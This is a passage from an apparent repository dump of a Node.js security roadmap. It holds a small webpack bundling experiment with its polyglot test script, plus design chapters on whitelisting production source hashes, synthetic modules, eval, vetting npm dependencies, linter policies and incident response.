 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | // test/test.js
19 | 
// NOTE(review): `expect` is required but not referenced below; the test
// makes no assertions and only checks that the calls do not throw.
var expect = require("chai").expect;
// Requiring the main module runs its top-level require() calls.
var app = require("../index");

describe("My TestSuite", () => {
  describe("A test", () => {
    it("A unittest", () => {
      // Exercise the API so that the module required inside lazyLoad()
      // is actually loaded during the test run.
      app.lazyLoad();
    });
  });
});
31 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/.gitignore:
--------------------------------------------------------------------------------
1 | dist
2 | node_modules


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/goodbye.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | exports.say = x => console.log(`Goodbye, ${x}!`);
19 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/hello.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | exports.say = x => console.log(`Hello, ${x}!`);
19 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/index.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
// Load package.json as data so a field in it can choose the module to load.
var metadata = require('./package.json');
// Dynamic load: the specifier is computed from the `greeting` field of
// package.json, so it is not a string literal in this file.
var greeting = require('./' + metadata.greeting);

// Calls the loaded module's exported say() with 'World'.
greeting.say('World');
22 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "webpack-compat-experiment",
 3 |   "description": "Figuring out how well webpack deals with dynamic loads",
 4 |   "version": "0.0.0",
 5 |   "main": "index.js",
 6 |   "dependencies": {},
 7 |   "scripts": {},
 8 |   "author": "Mike Samuel",
 9 |   "license": "Apache-2.0",
10 |   "greeting": "hello",
11 |   "devDependencies": {
12 |     "webpack": "^3.10.0"
13 |   }
14 | }
15 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/test-utils.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
/**
 * Test-only helper that always throws.
 *
 * The error message carries the marker text "NOT PRODUCTION CODE",
 * which test.sh searches for in dist/bundle.js to detect test code
 * that was bundled by mistake.
 *
 * @throws {Error} always.
 */
exports.doSomethingScaryButItsOkInTest = function() {
    throw new Error('test-utils.js: NOT PRODUCTION CODE');
};
21 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/test.sh:
--------------------------------------------------------------------------------
 1 | echo <<LICENSE
 2 | // Copyright 2017 Google LLC
 3 | //
 4 | // Licensed under the Apache License, Version 2.0 (the "License");
 5 | // you may not use this file except in compliance with the License.
 6 | // You may obtain a copy of the License at
 7 | //
 8 | //     https://www.apache.org/licenses/LICENSE-2.0
 9 | //
10 | // Unless required by applicable law or agreed to in writing, software
11 | // distributed under the License is distributed on an "AS IS" BASIS,
12 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | // See the License for the specific language governing permissions and
14 | // limitations under the License.
15 | LICENSE
16 | 
17 | echo <<POLYGLOT
18 | /*
19 | 
20 | This file is both a syntactically valid JS file and a bash file
21 | so that we can test webpack in its minimal configuration.
22 | In its minimal configuration, webpack tries to bundle this file.
23 | 
24 | You may run this file via
25 | 
26 | $ bash test.sh
27 | 
28 | The rest of this is visible to a shell interpreter but not when
29 | webpack mysteriously decides to load this as a JavaScript file.
30 | POLYGLOT
31 | 
32 | set -e
33 | 
34 | pushd "$(dirname "$0")"
35 | 
36 | echo Bundling
37 | rm -f dist/bundle.js
38 | ./node_modules/.bin/webpack
39 | 
40 | echo
41 | echo Running bundle
if node dist/bundle.js 2>&1 | grep -q 'Hello, World!'; then
    echo 'Ran ok'
else
    echo 'Failed to bundle dependency'
    # Fail the script (set -e is active) so callers see a non-zero exit
    # status, the same way the non-production-code check signals failure.
    false
fi
47 | 
48 | echo
49 | echo Looking for non production code
50 | if grep -Hn 'NOT PRODUCTION CODE' dist/bundle.js; then
51 |     echo 'Webpack bundled test code in its minimal configuration'
52 |     false
53 | fi
54 | 
55 | # */
56 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/test/test.js:
--------------------------------------------------------------------------------
 1 | /**
 2 |  * @license
 3 |  * Copyright 2017 Google LLC
 4 |  *
 5 |  * Licensed under the Apache License, Version 2.0 (the "License");
 6 |  * you may not use this file except in compliance with the License.
 7 |  * You may obtain a copy of the License at
 8 |  *
 9 |  *     https://www.apache.org/licenses/LICENSE-2.0
10 |  *
11 |  * Unless required by applicable law or agreed to in writing, software
12 |  * distributed under the License is distributed on an "AS IS" BASIS,
13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 |  * See the License for the specific language governing permissions and
15 |  * limitations under the License.
16 |  */
17 | 
18 | console.log('test/test.js: NOT PRODUCTION CODE');
19 | 


--------------------------------------------------------------------------------
/chapter-2/experiments/webpack-compat/webpack.config.js:
--------------------------------------------------------------------------------
 1 | const path = require('path');
 2 | 
 3 | module.exports = {
 4 |     output: {
 5 |         path: path.resolve('./dist'),
 6 |         filename: 'bundle.js',
 7 |     },
 8 |     entry: path.resolve('./index.js')
 9 | };
10 | 


--------------------------------------------------------------------------------
/chapter-2/source-contents.md:
--------------------------------------------------------------------------------
 1 | # Source Content Checks
 2 | 
 3 | The node runtime's module loader uses the `_compile` method to actually
 4 | turn file content into code thus:
 5 | 
 6 | ```js
 7 | // Run the file contents in the correct scope or sandbox. Expose
 8 | // the correct helper variables (require, module, exports) to
 9 | // the file.
10 | // Returns exception, if any.
11 | Module.prototype._compile = function(content, filename) {
12 |   content = internalModule.stripShebang(content);
13 | 
14 |   // create wrapper function
15 |   var wrapper = Module.wrap(content);
16 | 
17 |   var compiledWrapper = vm.runInThisContext(wrapper, {
18 | ```
19 | 
20 | At the top of that method body, we can check that the content
21 | is on a list of production sources.
22 | 
23 | The entire process looks like:
24 | 
25 | 1.  Developer develops and tests their app iteratively as normal.
26 | 2.  The developer generates a list of production sources via the
27 |     dynamic bundling scheme outlined earlier, a static tool like
28 |     webpack, or some combination.
29 | 3.  The bundling tool generates a file with a cryptographic hash
30 |     for each production source.
31 |     We prefer hashing to checking paths for reasons that will become
32 |     apparent later when we discuss `eval`.
33 | 4.  A deploy script copies the bundle and the hashes to a production server.
34 | 5.  The server startup script passes a flag to `node` or `npm start`
35 |     telling the runtime where to look for the production source hashes.
36 | 6.  The runtime reads the hashes and combines them with any hashes necessary
37 |     to whitelist any `node` internal JavaScript files that might load
38 |     via `require`.
39 | 7.  When a call to `require(x)` reaches `Module.prototype._compile`
40 |     it hashes `content` and checks that the hash is in the allowed set.
41 |     If not, it logs that and, if not in report-only-mode,
42 |     raises an exception.
43 | 8.  Normal log collecting and monitoring communicates failures
44 |     to the development team.
45 | 
46 | This is similar to [Content-Security-Policy (CSP)][csp] but for
47 | server-side code.  Like CSP, there is an intermediate step that might
48 | be useful between no enforcement and full enforcement:
49 | [report only mode][].
50 | 
51 | [CSP]: https://developers.google.com/web/fundamentals/security/csp/
52 | [report only mode]: https://developers.google.com/web/fundamentals/security/csp/#report-only
53 | 


--------------------------------------------------------------------------------
/chapter-2/synthetic-modules.md:
--------------------------------------------------------------------------------
  1 | # Statically eliminating `eval`
  2 | 
  3 | Pug provides a flexible API to load Pug templates from `.pug` files
  4 | that `eval`s the generated code ([code][pug-eval]),
  5 | and a command line interface for precompiling Pug files.
  6 | 
  7 | Let's ignore those and imagine ways to allow a Pug user to
  8 | compile a Pug template that makes the static nature apparent
  9 | even to an analysis which doesn't make assumptions about the
 10 | contents of `.pug` files.
 11 | 
 12 | ```js
 13 | const pug = require('pug');
 14 | 
 15 | exports.myTemplate = pug.lang`
 16 | doctype html
 17 | html
 18 |   head
 19 |     ...`;
 20 | ```
 21 | 
 22 | This code snippet uses a [tagged template literal][] to allow Pug
 23 | template code to appear inline in a JavaScript file.
 24 | 
 25 | Rather than loading a `.pug` file, we have declared it in JavaScript.
 26 | 
 27 | Imagine further that `pug.lang` runs the compiler, but instead of
 28 | using `new Function(...)` it uses some new module API
 29 | 
 30 | ```js
 31 | require.synthesize(generatedCode)
 32 | ```
 33 | 
 34 | which could manufacture a `Module` instance with the generated code and
 35 | install the module into the cache with the input hash as its filename.
 36 | 
 37 | When [bundling](bundling.md), we could dump the content of synthesized
 38 | modules, and, when the bundle loads in production, pre-populate
 39 | the module cache.  When the `pug.lang` implementation asks the
 40 | module loader to create a module with the content between
 41 | <code>&#96;...&#96;</code> it would find a resolved module ready but not
 42 | loaded.  If a module is already in the cache, `Module` skips the
 43 | additional content checks.
 44 | 
 45 | The Node runtime function, `makeRequireFunction`
 46 | ([code][makeRequireFunction]), defines a `require` for each module
 47 | that loads modules with the current module as the parent.  That would
 48 | also have to define a module specific `require.synthesize` that does
 49 | something like:
 50 | 
 51 | ```js
 52 |   function synthesize(content) {
 53 |     content = String(content);
 54 |     // Hashing gives us a stable identifier so that we can associate
 55 |     // code inlined during bundling with that loaded in production.
 56 |     const hash = crypto
 57 |         .createHash('sha512')
 58 |         .update(content, 'utf8')
 59 |         .digest();
 60 |     // A name that communicates the source while being
 61 |     // unambiguous with any actual file.
 62 |     const filename = '/dev/null/synthetic/' + hash;
 63 |     // We scope the identifier so that it is clear in
 64 |     // debugging trace that the module is synthetic and
 65 |     // to avoid leading existing tools to conclude that
 66 |     // it is available via registry.npmjs.org.
 67 |     const id = '@node-internal-synthetic/' + hash;
 68 |     const cache = Module._cache;
 69 |     let syntheticModule = cache[filename];
 70 |     if (syntheticModule) {
 71 |       // TODO: updateChildren(mod, syntheticModule, true);
 72 |     } else {
 73 |       cache[filename] = syntheticModule = new Module(id, mod);
 74 |       syntheticModule.loaded = true;
 75 |       syntheticModule._compile(content, filename);
 76 |     }
 77 |     // TODO: dump the module if the command line flags specify
 78 |     // a synthetic_node_modules/ output directory.
 79 |     return syntheticModule;
 80 |   }
 81 | 
 82 |   require.synthesize = synthesize;
 83 | ```
 84 | 
 85 | Static analysis tools often benefit from having a whole program
 86 | available.  Humans can reason about external files, like `.pug` files,
 87 | but static analysis tools often have to be unsound, or assume the
 88 | worst.  Synthetic modules may provide a way to move a large chunk of
 89 | previously unanalyzable code into the domain of what static analysis
 90 | tools can check.
 91 | 
 92 | This scheme might be more discoverable if code generator authors
 93 | adopted some conventions:
 94 | 
 95 | *  If a module defines `exports.lang` it should be usable as a
 96 |    template tag.
 97 | *  If that same function is called with an option map instead
 98 |    of as a template tag function, then it should return a function
 99 |    to enable usages like
100 |    ```js
101 |    pug.lang(myPugOptionMap)`
102 |      doctype html
103 |      ...`
104 |    ```
105 | *  If the first line starts with some whitespace, all subsequent
106 |    lines have that same whitespace as a prefix, and the language
107 |    is whitespace-sensitive, then strip it before processing.
108 |    This would allow indenting inline DSLs within a larger
109 |    JavaScript program.
110 | 
111 | We discuss template tag usability concerns in more detail later when
112 | discussing [library tweaks][library].
113 | 
114 | This proposal has one major drawback: we still have to trust the code
115 | generator.  Pug's code generator looks well structured, but reasoning
116 | about all the code produced by a code generator is harder than
117 | reasoning about one hand-written module.  The [frozen realms][] proposal
118 | restricts code to a provided API, as
119 | `vm.runInNewContext` aimed to.  If Pug, for example, chose to load its
120 | code in a sandbox, then checking just the provided context would give
121 | us confidence about what generated code could do.  In some cases, we
122 | might be able to move the code generator outside the
123 | [*trusted computing base*][TCB].
124 | 
125 | [tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals
126 | [pug-eval]: https://github.com/pugjs/pug/blob/926f7c720112cac76cfedb003e25e9f43d3a1767/packages/pug/lib/index.js#L261-L263
127 | [library]: ../chapter-7/libraries.md
128 | [makeRequireFunction]: https://github.com/nodejs/node/blob/8f5040771475ca5435b6cb78ab2ebce7447afcc1/lib/internal/module.js#L5
129 | [frozen realms]: https://github.com/tc39/proposal-frozen-realms
130 | [TCB]: https://en.wikipedia.org/wiki/Trusted_computing_base
131 | 


--------------------------------------------------------------------------------
/chapter-2/what-about-eval.md:
--------------------------------------------------------------------------------
 1 | # What about `eval`?
 2 | 
 3 | Previously we've talked about how to control what code loads
 4 | from the file system, but not what code loads from strings.
 5 | 
 6 | The rest of this discussion uses the term "`eval`" to refer to any of
 7 | the `eval` operator, the `eval` function, `new Function`,
 8 | `vm.runIn*Context`, `vm.Script.run*`, [`WebAssembly.compile`][]
 9 | and other operators that convert strings or bytes into code.
10 | 
11 | Recall that it is difficult to prove that code
12 | [does not `eval`](../chapter-1/threat-RCE.md):
13 | 
14 | ```js
15 | var x = {},
16 |     a = 'constructor',
17 |     b = 'constructor',
18 |     s = 'console.log(s)';
19 | x[a][b](s)();
20 | ```
21 | 
22 | Some node projects deploy with a tweaked node runtime that turns off
23 | some `eval` operators, but there are widely used npm modules that use
24 | them carefully.  For example:
25 | 
26 | *  [Pug][]  generates HTML from templates.
27 | *  [Mathjs][] evaluates closed-form mathematical expressions.
28 | 
29 | Both generate JavaScript code under the hood, which is dynamically
30 | parsed.  Let's consider two use cases:
31 | 
32 | *  Pug's code generator is usually called with trusted inputs, e.g.
33 |    `.pug` files authored by trusted developers.
34 | *  Mathjs is often called with untrusted inputs.  If a developer
35 |    wanted to let a user generate an ad-hoc report without having to
36 |    download data into a spreadsheet, they might use Mathjs to parse
37 |    user-supplied arithmetic expressions ([docs][more_secure_eval])
38 |    instead of trying to check that an input is safe to `eval` via
39 |    `RegExp`s.  It is not without risk ([advisory][adv552])
40 |    though [^1].
41 | 
42 | These two uses of code generators fall at either end of a spectrum.
43 | The uses of Pug seem static, all the information is available before
44 | we deploy.  Our Mathjs use case is necessarily dynamic since the
45 | input is not available until a user is in the loop.
46 | 
47 | Next we discuss ways to recognize and simplify the former, while
48 | double-checking the latter.  On the client, we have no options between
49 | allowing implicit `eval` and banning all uses of `eval`.  There are
50 | fewer compelling use cases on the client since it is harder to
51 | amortize code generation over multiple requests.  On the server, use
52 | of `eval` in the presence of untrusted inputs still needs to be
53 | carefully vetted.  We explore ways to programmatically enforce vetting
54 | decisions short of a blanket ban, but turning off `eval` before
55 | accepting untrusted inputs is still the most reliable way to prevent
56 | attackers from using `eval` against you.
57 | 
58 | [^1]: Since this writing, [Mathjs got rid of all uses of `eval`][no-eval-issue]
59 | 
60 | 
61 | [`WebAssembly.compile`]: http://webassembly.org/docs/js/#webassemblycompile
62 | [Pug]: https://pugjs.org/
63 | [Mathjs]: http://mathjs.org/
64 | [more_secure_eval]: http://mathjs.org/examples/advanced/more_secure_eval.js.html
65 | [adv552]: https://nodesecurity.io/advisories/552
66 | [no-eval-issue]: https://github.com/josdejong/mathjs/issues/1019#issuecomment-367289278
67 | 


--------------------------------------------------------------------------------
/chapter-3/knowing_dependencies.md:
--------------------------------------------------------------------------------
  1 | # Knowing your dependencies
  2 | 
  3 | ## Background
  4 | 
  5 | [`npmjs` search results][npmjs/node] have stats on download count and
  6 | open issues and PRs.
  7 | 
  8 | <img alt="npmjs.com stats for module node" src="../images/npmjs-node.png" height="399" width="230">
  9 | 
 10 | Each package page also links to the corresponding GitHub project
 11 | which has links to the project's [pulse][github-pulse].
 12 | 
 13 | Both of these give an idea of how popular the project is, and
 14 | whether it's actively developed.
 15 | 
 16 | On their GitHub pages, many projects proudly display
 17 | [badges and shields][] indicating their continuous integration status,
 18 | and other vital statistics.
 19 | 
 20 | The Linux Core Infrastructure project espouses a set of
 21 | [best practices badges][bpb] and defines tiers for mature infrastructure
 22 | projects.  We get some of the basic items for free by distributing via
 23 | `npm`, but other items bear on how responsive the project might be to
 24 | vulnerability reports and how it might respond to attempts to inject
 25 | malicious code:
 26 | 
 27 | *  Another will have the necessary access rights if someone dies
 28 | *  Monitor external dependencies to detect/fix known vulnerabilities
 29 | *  At least 2 unassociated significant contributors
 30 | *  Use 2FA
 31 | *  At least 50% of all modifications are reviewed by another
 32 | *  Have a security review (internal or external)
 33 | 
 34 | "Use 2FA" is possible with npm but it is not clear that it is widely
 35 | practiced.  [MTP][] discusses the support already built into GitHub
 36 | and `npm profile`.
 37 | 
 38 | 
 39 | ## Problem
 40 | 
 41 | Threats: [LQC][] [MTP][]
 42 | 
 43 | The npm repository, like other open-source code repositories,
 44 | contains mature and well-maintained modules, but also plenty of
 45 | bleeding-edge code that has not yet had bugs ironed out.
 46 | 
 47 | A wise technical lead might decide that they can use third-party
 48 | dependencies that have been widely used in production for several
 49 | years by projects with similar needs since gross errors are likely
 50 | to have been fixed.
 51 | 
 52 | That technical lead might also decide that they can use bleeding edge
 53 | code when they have enough local expertise to vet it, identify
 54 | corner-cases they need to check, and fix any gross errors they
 55 | encounter.
 56 | 
 57 | Either way, that decision to use bleeding-edge code or code that might
 58 | not be maintained over the long term should be a conscious one.
 59 | 
 60 | 
 61 | ## Success Criteria
 62 | 
 63 | Development teams are rarely surprised when code that they had built a
 64 | prototype on later turns out not to be ready for production use, and
 65 | they do not have to pore over others' code to vet many dependencies.
 66 | 
 67 | ## A Possible Solution
 68 | 
 69 | The building blocks of a solution probably already exist.
 70 | 
 71 | ### Aggregate more signals
 72 | 
 73 | `npmjs.com` may or may not be the right place to do this, but we
 74 | should, as a community, aggregate signals about modules and make
 75 | them readily available.
 76 | 
 77 | `npmjs.com/package` already aggregates some useful signals, but
 78 | it or another forum could aggregate more including
 79 | 
 80 | -  More of the GitHub pulse information including
 81 |    closed issues, PRs over time.
 82 | -  Relevant badges & shields for the project itself.
 83 | -  Relevant badges & shields by percentage of transitive
 84 |    dependencies and peer dependencies that have them.
 85 | -  Support channels, e.g. slack & discord.
 86 | -  Vulnerability reports and the version they affect.
 87 |    See sources in ["When all else fails"][failing]
 88 | -  Weighted mean of age of production dependencies transitively.
 89 | -  Results of linters (see [oversight][]) run without respecting
 90 |    [inline ignore comments][eslint-ignore-line] and
 91 |    [file ignore directives][eslint-ignore-file].
 92 | 
 93 | Users deciding whether to buy something from an online store or
 94 | download a cellphone app from an app store have reviews
 95 | and comments from other users.  That members of the community take
 96 | time to weigh in can be a useful signal, and the details can help
 97 | clarify whether this module or an alternative might be better for a
 98 | specific use.
 99 | 
100 | Large organizations who host [internal replicas][] may already have a
101 | lot of the opinion available internally, but aggregating that across
102 | clients can help smaller organizations and large organizations
103 | that are debating whether to dip their toe in.
104 | 
105 | 
106 | ### Leadership & Developer outreach
107 | 
108 | The node runtime already [passes][CI-node] the Linux Foundation's best
109 | practices criteria, but could lead the way by explaining how a project
110 | that pushes from GitHub to `registry.npmjs.org` can pass more of these
111 | criteria.
112 | 
113 | 
114 | [npmjs/node]: https://www.npmjs.com/package/node
115 | [github-pulse]: https://github.com/blog/1476-get-up-to-speed-with-pulse
116 | [badges and shields]: https://github.com/badges/shields
117 | [bpb]: https://github.com/coreinfrastructure/best-practices-badge
118 | [internal replicas]: ../chapter-4/close_dependencies.md
119 | [failing]: ../chapter-6/failing.md
120 | [CRY]: ../chapter-1/threat-CRY.md
121 | [LQC]: ../chapter-1/threat-LQC.md
122 | [MTP]: ../chapter-1/threat-MTP.md
123 | [oversight]: ../chapter-5/oversight.md
124 | [eslint-ignore-line]: https://eslint.org/docs/user-guide/configuring#disabling-rules-with-inline-comments
125 | [eslint-ignore-file]: https://eslint.org/docs/user-guide/configuring#ignoring-files-and-directories
126 | [CI-node]: https://bestpractices.coreinfrastructure.org/projects?gteq=50&q=Node.js
127 | 


--------------------------------------------------------------------------------
/chapter-5/oversight.md:
--------------------------------------------------------------------------------
  1 | # Oversight
  2 | 
  3 | 
  4 | ## Problem
  5 | 
  6 | Threats: [BOF][] [CRY][] [DEX][] [EXF][] [LQC][] [QUI][] [RCE][] [SHP][]
  7 | 
  8 | Manually reviewing third party modules for known security problems
  9 | is time consuming.
 10 | 
 11 | Having developers wait for such review unnecessarily slows down
 12 | development.
 13 | 
 14 | Our engineering processes ought not force us to choose between
 15 | forgoing sanity checks and shipping code in a timely manner.
 16 | 
 17 | 
 18 | ## Background
 19 | 
 20 | [JSConformance][] allows a project team to specify a policy for
 21 | Closure JavaScript.  This policy can encode lessons learned about APIs
 22 | that are prone to misuse.  By taking into account type information
 23 | about arguments and `this`-values it can distinguish problematic
 24 | patterns like `setTimeout(aString, dt)` from unproblematic ones
 25 | `setTimeout(aFunction, dt)`.
 26 | 
 27 | [TSLint][tslint] and [ESLint][eslint] both allow custom rules so can
 28 | be extended as a project or developer community identifies Good and
 29 | Bad parts of JavaScript for their particular context.
 30 | 
 31 | 
 32 | 
 33 | ## A possible solution
 34 | 
 35 | ### Encode lessons learned by the community in linter policies
 36 | 
 37 | Instead of reviewing lots of code, security specialists
 38 | should focus on improving tools.
 39 | Some APIs and idioms are more prone to misuse than others, and some
 40 | should be deprecated in favor of more robust ways of expressing the
 41 | same idea.  As the community reaches a rough consensus that a code
 42 | pattern is prone to misuse or there is a more robust alternative, we
 43 | could try to encode that knowledge in an automatable policy.
 44 | 
 45 | Linters are not perfect.  There are no sound production-quality static
 46 | type systems for JavaScript, so its linters are also necessarily
 47 | heuristic.  TSLint typically has more fine-grained type information
 48 | available than ESLint, so there are probably more anti-patterns that
 49 | TSLint can identify with an acceptable false-positive rate than
 50 | ESLint, but feedback about what can and can't be expressed in ESLint
 51 | might give its maintainers useful feedback.
 52 | 
 53 | Linters can reduce the burden on reviewers by enabling computer aided
 54 | code review &mdash; helping reviewers focus on areas that use powerful
 55 | APIs, and giving a sense of the kinds of problems to look out for.
 56 | 
 57 | They can also give developers a sense of how controversial a review
 58 | might be, and guide them in asking the right kinds of questions.
 59 | 
 60 | Custom policies can also help educate developers about alternatives.
 61 | 
 62 | The rule below specifies an anti-pattern for client-side JavaScript
 63 | in machine-checkable form, assigns it a name, has a short summary that
 64 | can appear in an error message, and a longer description or
 65 | documentation URL that explains the reasoning behind the rule.
 66 | 
 67 | It also documents a number of known exceptions to the rule, for
 68 | example, APIs that wrap `document.write` to do additional checks.
 69 | 
 70 | ```pb
 71 | requirement: {
 72 |   rule_id: 'closure:documentWrite'
 73 |   type: BANNED_PROPERTY
 74 |   error_message: 'Using Document.prototype.write is not allowed. '
 75 |       'Use goog.dom.safe.documentWrite instead.'
 76 |       ''
 77 |       'Any content passed to write() will be automatically '
 78 |       'evaluated in the DOM and therefore the assignment of '
 79 |       'user-controlled, insufficiently sanitized or escaped '
 80 |       'content can result in XSS vulnerabilities.'
 81 |       ''
 82 |       'Document.prototype.write is bad for performance as it '
 83 |       'forces document reparsing, has unpredictable semantics '
 84 |       'and disallows many optimizations a browser may make. '
 85 |       'It is almost never needed.'
 86 |       ''
 87 |       'Exceptions allowed for:'
 88 |       '* writing to a completely new window such as a popup '
 89 |       '  or an iframe.'
 90 |       '* frame busting.'
 91 |       ''
 92 |       'If you need to use it, use the type-safe '
 93 |       'goog.dom.safe.documentWrite wrapper, or directly '
 94 |       'render a Strict Soy template using '
 95 |       'goog.soy.Renderer.prototype.renderElement (or similar).'
 96 | 
 97 |   value: 'Document.prototype.write'
 98 |   value: 'Document.prototype.writeln'
 99 | 
100 |   # These uses have been determined to be safe by manual review.
101 |   whitelist: 'javascript/closure/async/nexttick.js'
102 |   whitelist: 'javascript/closure/base.js'
103 |   whitelist: 'javascript/closure/dom/safe.js'
104 | }
105 | ```
106 | 
107 | ----
108 | 
109 | We propose a project that maintains a set of linter policies per language:
110 | 
111 | *  A **common** policy suitable for all projects that identifies
112 |    anti-patterns that are generally regarded as bad practice by the
113 |    community with a low false positive rate.
114 | *  A **strict** policy suitable for projects that are willing to
115 |    deal with some false positives in exchange for identifying more
116 |    potential problems.
117 | *  An **experimental** policy that projects that want to contribute to
118 |    linter policy development can use.
119 |    New rules go here first, so that rule maintainers can get feedback
120 |    about their impact on real code.
121 | 
122 | 
123 | ### Decouple Reviews from Development
124 | 
125 | Within a large organization, there are often multiple review cycles, some
126 | concurrent:
127 | 
128 | -  Reviews of designs and use cases where developers gather information
129 |    from others.
130 | -  Code reviewers critique pull requests for correctness, maintainability,
131 |    testability.
132 | -  Release candidate reviews where professional testers examine a
133 |    partial system and try to break it.
134 | -  Pre-launch reviews where legal, security & privacy, and other
135 |    concerned parties come to understand the state of the system and
136 |    weigh in on what they need to be able to support its deployment.
137 | -  Limited releases where trusted users get to use an application.
138 | 
139 | Reviews should happen early and late.  When designing a system or a
140 | new feature, technical leads should engage specialists.  Before
141 | shipping, they should circle back to double check the implementation.
142 | During rapid development though, developers should drive development
143 | &mdash; they may ask questions, and may receive feedback (solicited
144 | and not), but ought not have to halt work while they wait for reviews
145 | from specialists.
146 | 
147 | Some changes have a higher security impact than others, so
148 | some will require review by security specialists, but not most.
149 | 
150 | During an ongoing security review, security specialists can contribute
151 | use cases and test cases; file issues; and help to integrate tools
152 | like linters, fuzzers, and vulnerability scanners.
153 | 
154 | As described in "[Keeping your dependencies close][]", new third-party
155 | modules are of particular interest to security specialists, but
156 | shouldn't require security review before developers use them on an
157 | experimental basis.
158 | 
159 | There are many workflows that allow people to work independently
160 | and later circle back so that nothing falls through the cracks.
161 | Below is one that has worked in similar contexts:
162 | 
163 | 1. The developer (or the automated import script) files a
164 |    tracking issue that is a prerequisite for pre-launch review.
165 | 2. If the developer later finds out that they don't plan on using
166 |    the unreviewed module, they can close the tracking issue.
167 | 3. The assigned security specialist asks follow-up questions and
168 |    reports their findings via the tracking issue.
169 | 4. A common pre-launch script queries a module metadata
170 |    database maintained by security to identify still-unvetted
171 |    dependencies.
172 | 
173 | [BOF]: ../chapter-1/threat-BOF.md
174 | [CRY]: ../chapter-1/threat-CRY.md
175 | [DEX]: ../chapter-1/threat-DEX.md
176 | [EXF]: ../chapter-1/threat-EXF.md
177 | [LQC]: ../chapter-1/threat-LQC.md
178 | [RCE]: ../chapter-1/threat-RCE.md
179 | [SHP]: ../chapter-1/threat-SHP.md
180 | [QUI]: ../chapter-1/threat-QUI.md
181 | [JSConformance]: https://github.com/google/closure-compiler/wiki/JS-Conformance-Framework
182 | [tslint]: https://palantir.github.io/tslint/develop/custom-rules/
183 | [eslint]: https://eslint.org/docs/developer-guide/working-with-rules-new#runtime-rules
184 | [Keeping your dependencies close]: ../chapter-4/close_dependencies.md
185 | 


--------------------------------------------------------------------------------
/chapter-6/failing.md:
--------------------------------------------------------------------------------
  1 | # When all else fails
  2 | 
  3 | ## Background
  4 | 
  5 | The ["Incident Handlers Handbook"][SANS] discusses at length how to
  6 | respond to security breaches, but the main takeaways are:
  7 | 
  8 | *  You need to do work before incidents happen to be able to
  9 |    respond effectively.
 10 | *  Similar measures can lower the rate of incidents.
 11 | *  You will still have incidents.
 12 | *  Being in a position to respond effectively can limit damage when
 13 |    incidents occur.
 14 | 
 15 | Node's proposed [security working group][security-wg]
 16 | includes in its charter measures to route information about
 17 | vulnerabilities and fixes to the right places, and coordinate response
 18 | and disclosure.
 19 | 
 20 | Package monitoring services like [nodesecurity], GitHub's
 21 | [package graph][github graph], [snyk][], and the
 22 | [nodejs-sec list][nodejs-sec] aim to help vulnerability reports get to
 23 | those who need them.
 24 | 
 25 | 
